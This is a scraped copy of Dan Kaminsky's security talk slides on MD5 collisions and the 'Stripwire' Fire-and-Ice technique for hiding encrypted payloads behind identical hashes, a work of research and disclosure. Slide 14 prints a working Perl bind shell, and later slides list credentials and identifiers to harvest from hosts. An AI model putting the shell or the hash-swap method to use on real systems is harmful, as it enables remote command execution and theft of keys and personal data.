Dmk sb2010 web_defense
Dmk sb2010 web_defenseDmk sb2010 web_defense
Dmk sb2010 web_defense
 
Bh eu 05-kaminsky
Bh eu 05-kaminskyBh eu 05-kaminsky
Bh eu 05-kaminsky
 
Dmk audioviz
Dmk audiovizDmk audioviz
Dmk audioviz
 
Bo2004
Bo2004Bo2004
Bo2004
 
Gwc3
Gwc3Gwc3
Gwc3
 
Dmk bo2 k8_ccc
Dmk bo2 k8_cccDmk bo2 k8_ccc
Dmk bo2 k8_ccc
 

232 md5-considered-harmful-slides

  • 1. MD5 To Be Considered Harmful (Someday) Dan Kaminsky
  • 2. Basics  MD5: Hashing algorithm – “Fingerprint” of data – easy to synthesize (push here), hard to fake (grow this) – Known since 1997 it was theoretically not so hard to create two different sets of data with the same hash – Recently: Not so theoretical  All they released: The two sets of data (“vectors”)
  • 3. Limitations  Poor understanding of how to actually exploit the MD5 collision – Collision mechanism unreleased – Collisions only creatable between two specially designed sets of data – not a general purpose attack  Same output as the birthday attack. So, if birthday dropped MD5 security to 2^64 (which we’ve said for years), Wang dropped MD5 security to 2^24-2^32. Ouch. – Summary: A fundamental constraint of the system has been violated…but what this means is unclear
  • 4. The Question  Is it possible, with nothing but the two vectors with matching MD5 hashes, to find an applied security risk? – Answer: Yes. – Caveats: This is early. This is rudimentary. This is not the BIC Pen to the tubular lock of MD5. But it’s interesting.
  • 5. The Thesis  MD5 presents functionally weaker security constraints than the cryptographically secure hash primitive offers in general, and SHA-1 in particular.  1. MD5 hashes can no longer imply the behavior of executable data – If md5(exe1) == md5(exe2), behavior(exe1) ?= behavior(exe2) – “Stripwire”, C(CC|NN)  2. MD5 hashes can no longer imply the information equivalence of datasets – If md5(data1) == md5(data2), information(data1) ?= information(data2) – P2P attacks
  • 6. How MD5 Works  MD5 is a block-based algorithm – Start with a 128 bit system state (arbitrary) – Stir in 512 bits of data – Repeat until no more data – End up with 128 bits, all stirred up  Security is provided by the difficulty of figuring out how to precisely stir the initial state
  • 7. A Curious Trait of Block Based Hashes  If two files have the same hash, then two files appended with the same data also have the same hash – if md5(x) == md5(y) then md5(x+q) == md5(y+q)  Assuming length(x) mod 64 == 0 – The information of the two files’ difference was lost in the stirring – This is a well known trait among those who work with block- based algorithms
  • 8. Definitions  vec1, vec2 – Our two files (“vectors”) with the exact same hash  Payload – A set of commands to do “stuff”.  Encrypted Payload – Payload encrypted using the SHA-1 hash of vec1 as a key
  • 9. In Fire and Ice  Two Files: Fire and Ice – Fire = vec1 and Encrypted Payload – Ice = vec2 and Encrypted Payload  Fire contains sufficient context to be decrypted and executed – Key=sha1(vec1), which decrypts the payload  Ice doesn’t contain vec1, so there’s insufficient context to decrypt the payload – The payload is frozen.
  • 10. The Other Shoe Drops  Fire and Ice have the same MD5 hash.  md5(x+q) == md5(y+q) – x = vec1 – y = vec2 – q = encrypted payload  Fire executes an arbitrary series of commands  Ice resists reverse engineering with the strength of the encryption algorithm (AES)
  • 11. Demo[0]: The Vectors  $vec1 = h2b(“ d1 31 dd 02 c5 e6 ee c4 69 3d 9a 06 98 af f9 5c 2f ca b5 87 12 46 7e ab 40 04 58 3e b8 fb 7f 89 55 ad 34 06 09 f4 b3 02 83 e4 88 83 25 71 41 5a 08 51 25 e8 f7 cd c9 9f d9 1d bd f2 80 37 3c 5b d8 82 3e 31 56 34 8f 5b ae 6d ac d4 36 c9 19 c6 dd 53 e2 b4 87 da 03 fd 02 39 63 06 d2 48 cd a0 e9 9f 33 42 0f 57 7e e8 ce 54 b6 70 80 a8 0d 1e c6 98 21 bc b6 a8 83 93 96 f9 65 2b 6f f7 2a 70”);  $vec2 = h2b(“ d1 31 dd 02 c5 e6 ee c4 69 3d 9a 06 98 af f9 5c 2f ca b5 07 12 46 7e ab 40 04 58 3e b8 fb 7f 89 55 ad 34 06 09 f4 b3 02 83 e4 88 83 25 f1 41 5a 08 51 25 e8 f7 cd c9 9f d9 1d bd 72 80 37 3c 5b d8 82 3e 31 56 34 8f 5b ae 6d ac d4 36 c9 19 c6 dd 53 e2 34 87 da 03 fd 02 39 63 06 d2 48 cd a0 e9 9f 33 42 0f 57 7e e8 ce 54 b6 70 80 28 0d 1e c6 98 21 bc b6 a8 83 93 96 f9 65 ab 6f f7 2a 70”);
  • 12. Demo[1]: Equivalence  $ md5sum.exe vec1 vec2; sha1sum.exe vec1 vec2 79054025255fb1a26e4bc422aef54eb4 *vec1 79054025255fb1a26e4bc422aef54eb4 *vec2 a34473cf767c6108a5751a20971f1fdfba97690a *vec1 4283dd2d70af1ad3c2d5fdc917330bf502035658 *vec2
  • 13. Demo[2]: Still The Same  $ dd if=/dev/urandom bs=1024 count=1024 > arbitrary_data 1024+0 records in 1024+0 records out  $ cat vec1 arbitrary_data > v1_arb $ cat vec2 arbitrary_data > v2_arb  $ md5sum.exe v1_arb v2_arb; sha1sum.exe v1_arb v2_arb e9b26b1b200e1c848196b264d4589174 *v1_arb e9b26b1b200e1c848196b264d4589174 *v2_arb 7a7961d6f31dada14f1f20290754c49860c22da4 *v1_arb 466dff783f129c668419cbaa180a5c67b8ace03d *v2_arb  But they still differ at the start.
  • 14. Demo[3]: Our Payload  $ cat backlash.pl #!/usr/bin/perl # Backlash: Open a pseudoshell on port 50023 # Author: Samy Kamkar, www.lucidx.com use IO; while(1){ while($c=new IO::Socket::INET(LocalPort, 50023,Reuse,1,Listen)->accept){ $~->fdopen($c,w); STDIN->fdopen($c,r); system$_ while<>; } }
  • 15. Demo[4]: Packaging The Payload  $ ./stripwire.pl -v -b backlash.pl fire.bin: md5 = 4df01ec3a18df7d7d6cdf8e16e98cd99 ice.bin: md5 = 4df01ec3a18df7d7d6cdf8e16e98cd99 fire.bin: sha1 = a7f6ebb805ac595e4553f84cb9ec40865cc11e08 ice.bin: sha1 = 85f602de91440cd877c7393f2a58b5f0d72cbc35
  • 16. Demo[5]: Altered Behavior, Same Hash  $ ./stripwire.pl -v -r ice.bin Unable to decrypt file: ice.bin $ ./stripwire.pl -v -r fire.bin & $ telnet 127.0.0.1 50023 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. cat /etc/ssh_host_dsa_key_demo -----BEGIN DSA PRIVATE KEY----- MIH5AgEAAkEAlcTshGgpYY0eQgRBJRyQCrBDgXhFWFTbxazsgbrKie bh1aal4ET6vPYZ7/OlPbrKxwMnX5mcEHywmEhOcK00pwIVAJyQ0Zlk pRPr2eJWz/ECgr1XgUvPAkBWeUy6MJHApO5sF+T0V7vs319fGvw0j8 dthueQ2pAZHJl063SC2n9JkaMZRHEnJ7c0 4xMEHnFdmIvxTNFCavKZAkEAieVtNTFNNV7SIf0m4z60mJ1Hz3zj50 R7ih1SSxPon+IxzKsoAEP9JkyjS67+HBQGpowxNuukOFaqDwl1gclG fwIVAJuPpSn6yj2ez5m7aTzZ7-----END DSA PRIVATE KEY-----
  • 17. Is Tripwire Dead?  Short Answer: No. – “The Externality Argument”: Executable behavior is not entirely specified by file data  Hardware Characteristics (CPU, Temp)  File Metadata (Name, Date)  Network Metadata (DNS searchlist, IP)  Memory-Only Exploits  Random Number Generator  Network Activity (ET Phone Home) – “The Infallible Auditor Argument”: Ice must be trusted before Fire may be swapped in  “But why are you trusting ice?”
  • 18. Does Tripwire Have A Problem?  Short Answer: Yes – The “Externality Argument”  “Why not just have the application download new code to run?”  Yes. Commands can be gotten from outside the MD5-hashed dataset. No hashing algorithm can verify the integrity of data it’s not hashing. But MD5 is failing to verify the integrity of data it is hashing. – The “Infallible Auditor Argument”  “Who would trust ice?”  That another defense will, hopefully, prevent the MD5 failure from being exploited does not mean the MD5 failure has not brought us closer to exploitability – Black box testing will never detect that Ice can become Fire – and there is another failure mode…
  • 19. On The Power Of Auditors[0]  Halting Problem limits ability of auditors – Obfuscatory capabilities are great – couple bit difference allows for the envelopment of payload in AES shell  Encrypted data and compressed data have near-identical entropy profiles – embedded compressed content common  Can also embed a JPEG containing steganographically encoded instructions – If I can “trick” an auditor into trusting something that will never actually do any damage, no matter what the inputs or outputs happen to be, then I can later swap that perfectly harmless executable for one with arbitrary behavior  This is new.
  • 20. On The Power Of Auditors[1]  Diffie-Helman Prime Conflation – Significant because there’s nothing for an auditor to detect, but the failure critically defeats a cryptographic subsystem  Discovered by John Kelsey, verified by Ben Laurie – DH requires prime moduli – Vec1 || 0000000000000000000000000000001B is prime – Vec2 || 0000000000000000000000000000001B is not prime – Send Vec1 set to auditor – impossible to detect that vec2 can be swapped in to destroy the cryptosystem
  • 21. Applied Failure Scenarios  Auditor Bypass – Developers send one payload to testers, another to factory – Developers can be seen as auditors too – infect the build tools, only what gets shipped gets infected. Developers can’t use MD5 hash to verify equivalence between sent and shipped.  Distributed Package Management – MD5 hashes are centrally distributed, along with mirror lists. Files acquired from mirrors are tested against MD5 hash. If match, install. – Mirrors can send Ice to central package manager and Fire to whoever they like
  • 22. Bit Commitment Also Falls  Bit Commitment (Slashdotter) – Alice sends Bob MD5 hash of data, “committing” her to some dataset – Bob makes bets based on what he guesses Alice has – Intended Behavior: Bob registers bets, Alice sends data, Bob verifies hash, Alice pays off bets – New Behavior: Bob registers bets, Alice selects dataset where she wins, Bob verifies hash, Alice doesn’t pay
  • 23. The (Still Secret) Actual Attack  Everything we’ve done has been with just the test vectors – Append only, single bit of information  Actual attack is much more powerful – Adjusts to any state of the MD5 machine  Can now both append and prepend w/o changing final hash  Fire.exe and Ice.exe – no execution harness required – Can create any number of swappable collisions – actually relatively fast to do so (Joux’s insight)  “Doppelganger” blocks – they may exist anywhere within a file, and may be swapped out for one another without altering the ultimate MD5 hash
  • 24. HMAC: Not Completely Invulnerable  HMAC algorithm: – Inner = MD5(Key XOR 0x36 + Data) – Outer = MD5(Key XOR 0x5c + Inner) – HMAC-MD5 = Outer  Been said this is totally immune. It’s not. – Actual attack adapts to any initial state. Inner creates a new initial state that Data is integrated into. If attacker knows Key, can create colliding data – Would be impossible if Data was double-hashed in both Inner and Outer loop – would have to adapt Data to two different initial states
  • 25. HMAC: Arguably Invulnerable Enough  MAC Primitive is allowed to collapse when key is known. – Most other MACs do – This completely obviates most applied risks  Still worth noting… – We’ve never been able to create an HMAC-MD5 collision before, key or not. – HMAC-MD5 has degraded in a way HMAC-SHA1 has not. – Microsoft X-BOX signs HMAC-SHA1. There are thus deployed products that desire both collision resistance and MAC properties.  Digital signatures completely vulnerable
  • 26. Bits and Pieces  Vec1 vs. Vec2 = A Single Bit Of Information  Suppose we can calculate multicollisions – 2 collisions = 1 bit (2^1), 4 collisions = 2 bits (2^2), 256 collisions = 8 bits (2^8) – Note it gets more and more expensive to add bits this way  Remember we aren’t tied to the default initial state of MD5 – We can chain sets of doppelgangers together – Data capacity is summed across every set – 16 blocks, each adapting to emitted state of the last, each with 256 possibilities, yields 128 bits
  • 27. MD5 Steganography  Data can be embedded within a supposedly “constant” file that actually changes, with MD5 unable to see those changes – CRC-32 and TCP/IP checksums vulnerable to this too – But MD5 promises computational infeasibility – “this is the exact same data you hashed back then”  It doesn’t have to be.  Defense against malicious intent part of the MD5 mandate
  • 28. P2P Yeah You Know Me  MP3 – MP3 players skip over “garbage blocks”  vec1/vec2 or our doppelganger set – P2P tools commonly distribute MP3’s; use hashes to organize this distribution  Searching – Hashes coalesce identical content  Verifying – Hashes guarantee what was searched for is what was downloaded  Note: I’m not taking sides. I’m demonstrating broken applications. – Possible to prepend each MP3 with a 128 bit multi- doppelganger set, without breaking search or violating integrity  Allows tracing 3rd generation downloads to 2nd uploads
  • 29. Execute Able  Limit of MP3 tracing: Can only get back what you put in – MP3 decoders not Turing complete (sans major exploit) – Software installers are, though  Installer Strikeback: Installer self-modifies w/ fingerprint of host it’s being installed on – Instead of trying to trick the attacker into “phoning home” (say with DNS), piggyback on their inevitable generosity to share n most valuable bits – Can also work multi-generation – i.e. mutate as distributed along a P2P network, and the net won’t notice / complain
  • 30. Personal Identifiers  Stuff to get – Network data -- IP address, DNS name, default name server, MAC address – Browser Cookies, Caches, and Password Stores -- Online Banking, Hotmail, Amazon 1-Click – Cached Instant Messenger Credentials -- Yahoo, AOL IM, MSN, Trillian – P2P Memberships -- KaZaA, Gnutella2 – Corporate Identifiers -- VPN Client Data / Logs – Shipped Material -- CPU ID, Vendor ID, Windows Activation Key – System Configurations -- Time Zone, Telephone API area code – Wireless Data -- MAC addresses of local access points – Existence Tests -- Special files in download directory
  • 31. The Caveat  None of this works w/o the actual attack – Can’t make new doppelganger blocks – Can’t chain from anything but default MD5 initial state –   Are we lost? – No – thank you KaZaA
  • 32. Packing the kzhash  Kzhash – custom hashing mode using MD5 – Based on Merkle’s Tiger Trees – Not the standard “magnet”/TTH links – First half = MD5(first 300K of file) – Second half = All proceeding 32K chunks  Two benefits – Able to distribute hashing load across time to download, even with out of order data acquisition – Able to efficiently calculate integrity-verifying sums for partial datasets
  • 33. Smoking the kzhash  Restarting the hash every 32K == Hash begins from initial state every 32K == Hash begins from vec1/vec2 state every 32K == We can embed one bit every 32K  Specifics – Vec1 and Vec2 are 128 bytes apiece (0.09% efficiency, wow) – 32768-128=32640 bytes of payload  Only 0.4% data expansion  MP3: Average size == 4.5MB => 4.2MB of 32K chunks => 134 bits of KaZaA-stego per MP3 today  Apps: Average size == 60MB => 1920 bits – Added space offset by need for redundancy – larger the file, more hosts may serve 32K chunks
  • 34. Kzhash Demo  #setup dd if=/dev/urandom of=foo bs=32640 count=1 cat vec1 foo > 1 cat vec2 foo > 0  $ cat 1 1 0 1 1 0 1 0 | perl kzhash.pl 76b5764721b8911cf227066e11837142 $ cat 0 0 0 0 1 1 1 1 | perl kzhash.pl 76b5764721b8911cf227066e11837142  Works today.
  • 35. Conclusion  We’ve known MD5 was weak for a very long time – 1997 was the first brick to fall – More will come  USE SHA-1! 